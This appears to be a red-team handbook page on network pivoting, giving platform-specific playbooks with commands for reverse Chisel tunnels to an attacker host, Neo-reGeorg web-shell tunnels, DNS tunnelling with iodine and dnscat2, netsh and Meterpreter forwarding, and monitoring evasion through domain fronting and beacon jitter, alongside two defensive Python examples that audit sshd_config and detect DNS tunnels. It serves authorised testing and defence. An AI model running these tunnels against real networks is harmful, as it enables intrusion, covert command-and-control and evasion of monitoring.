Platform-Specific Pivoting Strategies
# Overview
Pivoting strategies depend heavily on the operating systems you encounter and the network monitoring in place. This section provides playbooks for different environments, helping you choose the right tools for each situation.
# Linux-Only Networks
Linux hosts provide the most pivoting options. SSH, iptables, socat, and TUN/TAP interfaces are all available.
# Recommended Tools
| Task | Tool | Why |
|---|---|---|
| SOCKS proxy | SSH -D / Chisel | Fast, encrypted |
| Transparent proxy | SSHuttle / Ligolo-ng | All apps work |
| Port forward | SSH -L/-R / socat / iptables | Many options |
| DNS tunnel | iodine / dnscat2 | Full IP tunnel (iodine needs root for its TUN interface) |
| Multi-hop | SSH -J / proxychains | Clean chaining |
# Quick Playbook
```bash
# 1. Check egress
curl -s http://ifconfig.me # HTTP
ssh <external_host> # SSH
nslookup <domain> <dns_ip> # DNS
ping -c 1 <external_ip> # ICMP
# 2. If SSH egress exists:
sshuttle -r user@pivot 172.16.0.0/12 --dns
# Or:
ssh -D 1080 user@pivot
# 3. If only HTTP egress:
# Generate the tunnel script with `python3 neoreg.py generate -k <password>`,
# upload it to the web server, then run the client on the attacker host:
python3 neoreg.py -k <password> -u http://target/tunnel.aspx
# 4. If only DNS egress (iodined is the server half, run on the attacker-controlled
#    DNS host; the pivot runs the iodine client against the same domain):
sudo iodined -f -c -P pass 10.0.0.1 dnscat2.example.com
# 5. Multi-hop:
ssh -J user@pivot1,user@pivot2 -D 1080 user@target
```
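On the defending side, every SSH option this playbook relies on (`-D`, `-L`/`-R`, TUN/TAP via `-w`, agent relay) is governed by sshd_config. The Python audit below is an added example, not code from the original page: it parses a config (honouring `Match` blocks, which are assumed to use only `User` criteria) and lists the directives whose effective value for a given user still permits forwarding.

```python
import re

# directive -> (value that disables the feature, OpenSSH default when absent)
PIVOT = {"allowtcpforwarding": ("no", "yes"),    # ssh -D / -L / -R
         "gatewayports": ("no", "no"),           # remote forwards on all interfaces
         "permittunnel": ("no", "no"),           # layer-3 TUN/TAP tunnels (ssh -w)
         "allowagentforwarding": ("no", "yes")}  # agent relay through the pivot

def parse_sshd_config(text):
    """Return (global_settings, [(match_criteria, settings), ...]); keys are
    lower-cased and the first occurrence in a section wins, as in sshd."""
    global_cfg, matches, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            current = {}
            matches.append((value, current))
        else:
            (global_cfg if current is None else current).setdefault(key, value)
    return global_cfg, matches

def pivot_findings(text, user="*"):
    """Directives whose effective value for `user` still permits SSH pivoting."""
    global_cfg, matches = parse_sshd_config(text)
    cfg = {}
    for criteria, settings in matches:  # assumption: criteria are 'User a,b' only
        if user in criteria.replace(",", " ").split()[1:]:  # block overrides globals
            for k, v in settings.items():
                cfg.setdefault(k, v)
    for k, v in global_cfg.items():
        cfg.setdefault(k, v)
    return sorted(k for k, (safe, default) in PIVOT.items()
                  if cfg.get(k, default).lower() != safe)

# Constructed sample: forwarding on globally, off for two service accounts,
# and an admin account additionally allowed to build TUN/TAP tunnels.
SAMPLE_CONFIG = """\
AllowTcpForwarding yes          # needed by ssh -D / -L
GatewayPorts clientspecified
PermitTunnel no
Match User deploy,backup
    AllowTcpForwarding no
    AllowAgentForwarding no
Match User admin
    PermitTunnel yes
"""
```

Run `pivot_findings(SAMPLE_CONFIG, "admin")` to see how a single `Match` block re-enables tunnelling for one account while the service accounts stay locked down.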
# Windows-Only Networks
Windows hosts have fewer native pivoting options. SSH (OpenSSH), netsh, and Plink are the primary tools.
# Recommended Tools
| Task | Tool | Why |
|---|---|---|
| SOCKS proxy | Chisel / Ligolo-ng agent | Single binary, no deps |
| Port forward | netsh portproxy / Plink | Native or lightweight |
| HTTP tunnel | Earthworm / Neo-reGeorg | Binary or web shell |
| Metasploit | autoroute + portfwd | If Meterpreter present |
| DNS tunnel | dnscat2 client | If only DNS egress |
# Quick Playbook
```cmd
:: 1. Check egress (HTTP, SSH, DNS, ICMP; cmd only treats :: as a comment at line start)
curl http://ifconfig.me
ssh user@external_host
nslookup domain dns_ip
ping external_ip
:: 2. If you can upload Chisel:
chisel.exe client <attacker>:8080 R:socks
:: 3. If you have Meterpreter (these two run in the Meterpreter console on the attacker host):
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.10
:: 4. If you have admin access:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.0.10 connectport=80
:: 5. If only HTTP egress and no binary upload:
:: Upload the Neo-reGeorg ASPX tunnel, then run the client on the attacker host:
python3 neoreg.py -k pass -u http://target/tunnel.aspx
```
# Mixed OS Networks
Most real networks have both Linux and Windows. Use tools that work across both or chain between OS types.
# Strategy: Linux Pivot → Windows Target
```bash
# 1. Compromise Linux host in DMZ
ssh user@linux-dmz
# 2. Enumerate internal network from Linux
nmap -sn 172.16.0.0/24
# 3. Create SOCKS proxy through Linux pivot
ssh -D 1080 user@linux-dmz
# 4. Access Windows targets through SOCKS
proxychains4 nmap -sT -Pn 172.16.0.20 -p 3389
proxychains4 xfreerdp /v:172.16.0.20 /u:admin
# 5. Compromise Windows target
# Upload chisel.exe to Windows target
chisel.exe client <attacker>:8080 R:socks
# 6. Now you have SOCKS through the Windows target too
# Chaining: attacker → linux-dmz → windows-internal → deeper network
```
# Strategy: Windows Pivot → Linux Target
```cmd
:: 1. Compromise Windows host
:: 2. Start Chisel client for SOCKS
chisel.exe client <attacker>:8080 R:socks
:: 3. Or use netsh for specific port forwards
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=2222 connectaddress=172.16.0.10 connectport=22
:: 4. SSH to Linux targets through the forward
ssh -p 2222 user@<windows-pivot>
```
# Heavily Monitored Networks
Networks with IDS/IPS, DLP, and traffic analysis require stealth-focused pivoting.
# Principles
- Blend with normal traffic: Use HTTPS on port 443, DNS on port 53
- Minimize connection count: Fewer long-lived connections > many short ones
- Use legitimate protocols: HTTPS, DNS, ICMP are less suspicious than raw TCP on unusual ports
- Domain fronting: Hide the real C2 destination behind a CDN
- Jitter and timing: Add randomness to beacon intervals
# Recommended Tools
| Tool | Protocol | OPSEC |
|---|---|---|
| Chisel + TLS | HTTPS | Encrypted, custom domain |
| Ligolo-ng | TLS with selfcert | Encrypted, looks like normal TLS |
| Cloudflare Tunnel | HTTPS through CDN | Legitimate CDN traffic |
| dnscat2 | DNS TXT/CNAME | DNS is rarely inspected |
| Neo-reGeorg + HTTPS | HTTPS | Encrypted web tunnel |
| Domain fronting | HTTPS through CDN | Hides real destination |
# Playbook
```bash
# 1. Use Chisel with TLS and authentication (chisel's flags are --tls-key / --tls-cert)
chisel server -p 443 --reverse --tls-key /tmp/key.pem --tls-cert /tmp/cert.pem --auth user:pass
# 2. Or use Cloudflare Tunnel for C2
cloudflared tunnel run redteam-tunnel
# 3. DNS fallback if HTTPS is monitored
ruby dnscat2.rb c2.example.com --secret=<key>
# 4. Domain fronting for C2 callbacks
# See [Redirectors & Fronting](../c2-infrastructure/redirectors-and-fronting.md)
```
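The tool table above calls DNS "rarely inspected"; the defender's counterpoint is that iodine/dnscat2 traffic is easy to spot once someone looks at query names, because upstream data travels in long, high-entropy, never-repeating subdomains. The Python heuristic below is an added example, not code from the original page: it scores parent domains in a constructed `client qname qtype` query log, and its thresholds are assumptions to tune against your own resolver's baseline.

```python
import math
from collections import defaultdict

# Assumed thresholds; tune them against your own resolver's baseline.
MIN_QUERIES, MIN_LABEL_LEN, MIN_ENTROPY, MIN_UNIQUE_RATIO = 5, 30, 3.5, 0.9

def shannon_entropy(s):
    """Bits per character; encoded payloads sit near the alphabet's maximum."""
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def parent_domain(qname, levels=2):
    """Registrable-domain approximation: the last `levels` labels (no PSL lookup)."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])

def tunnel_candidates(log_lines):
    """Return parent domains whose queries look like a covert channel.

    Each line is a constructed "client qname qtype" record. A domain is flagged
    when its subdomains are long, high-entropy and almost never repeated, which
    is how iodine/dnscat2 carry upstream data inside the query name.
    """
    stats = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0})
    for line in log_lines:
        _client, qname, _qtype = line.split()
        parent = parent_domain(qname)
        sub = qname[: -len(parent) - 1] if qname != parent else ""
        s = stats[parent]
        s["n"] += 1
        s["subs"].add(sub)
        s["len"] += len(sub)
        s["ent"] += shannon_entropy(sub.replace(".", ""))
    flagged = [p for p, s in stats.items() if s["n"] >= MIN_QUERIES
               and s["len"] / s["n"] >= MIN_LABEL_LEN
               and s["ent"] / s["n"] >= MIN_ENTROPY
               and len(s["subs"]) / s["n"] >= MIN_UNIQUE_RATIO]
    return sorted(flagged)

# Constructed sample log: ordinary lookups plus eight tunnel-style queries whose
# 48-character base32-looking labels never repeat.
_B32 = "abcdefghijklmnopqrstuvwxyz234567"
NORMAL = ["10.0.0.5 www.example.com A"] * 6 + ["10.0.0.5 mail.example.com MX",
                                               "10.0.0.6 api.example.com A"]
TUNNEL = ["10.0.0.7 " + "".join(_B32[(7 * i + 3 * j) % 32] for j in range(48))
          + ".tunnel-example.net TXT" for i in range(8)]
SAMPLE_LOG = NORMAL + TUNNEL
```

`tunnel_candidates(SAMPLE_LOG)` returns only `tunnel-example.net`; the ordinary `example.com` lookups fail the label-length test even though they exceed the query-count floor.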
# Air-Gapped Networks
Air-gapped networks have no internet connectivity. Pivoting must stay within the internal network.
# Strategy
- Physical access: USB drops, malicious devices (Bash Bunny, Rubber Ducky)
- Dual-homed hosts: Find hosts with connections to both the air-gapped network and an external network
- Wireless bridges: If wireless is available, see 13 - Wireless Pentesting
- Out-of-band channels: Bluetooth, infrared, ultrasound, electromagnetic emanations
# Playbook
```bash
# 1. Enumerate for dual-homed hosts
ip addr | grep -E "inet "
ip route
# 2. If you find a host with two interfaces:
# Interface 1: air-gapped network (10.0.0.0/8)
# Interface 2: internet-connected network (192.168.0.0/24)
ssh -D 1080 user@dual-homed-host
# 3. Route air-gapped traffic through the SOCKS proxy
proxychains4 nmap -sn 10.0.0.0/24
# 4. If no dual-homed hosts, look for:
# - Shared storage (NAS, SAN) accessible from both networks
# - Management interfaces (iDRAC, iLO) on a different network
# - Wireless adapters on air-gapped hosts
```
# Quick Decision Matrix
```text
What egress is available?
├── SSH → SSH -D / SSHuttle / Chisel
├── HTTP/HTTPS → Neo-reGeorg / Earthworm / Chisel TLS
├── DNS only → dnscat2 / iodine
├── ICMP only → ptunnel-ng / icmpsh
├── None (air-gapped) → Find dual-homed / wireless bridge
└── Cloud egress → Cloudflare Tunnel / ngrok / WireGuard

How many hops?
├── 1 hop → SSH -D / Chisel / Ligolo-ng
├── 2 hops → SSH -J / proxychains
└── 3+ hops → proxychains nested / Chisel relay

What OS is the pivot?
├── Linux → SSH / socat / iptables / SSHuttle
├── Windows → Chisel / netsh / Plink / Meterpreter
└── Both → Chisel (cross-platform binary)

Is the network monitored?
├── Light monitoring → Any tool
├── Heavy monitoring → Chisel TLS / Cloudflare Tunnel / dnscat2
└── Air-gapped → Dual-homed / wireless / physical
```
# Cross-References
- Network Enumeration — Egress and firewall discovery
- Tunnels & Proxies — All tunneling tools
- Port Forwarding — Port forwarding methods
- C2 Infrastructure — C2 setup for monitored networks
- 13 - Wireless Pentesting — Wireless bridges for air-gapped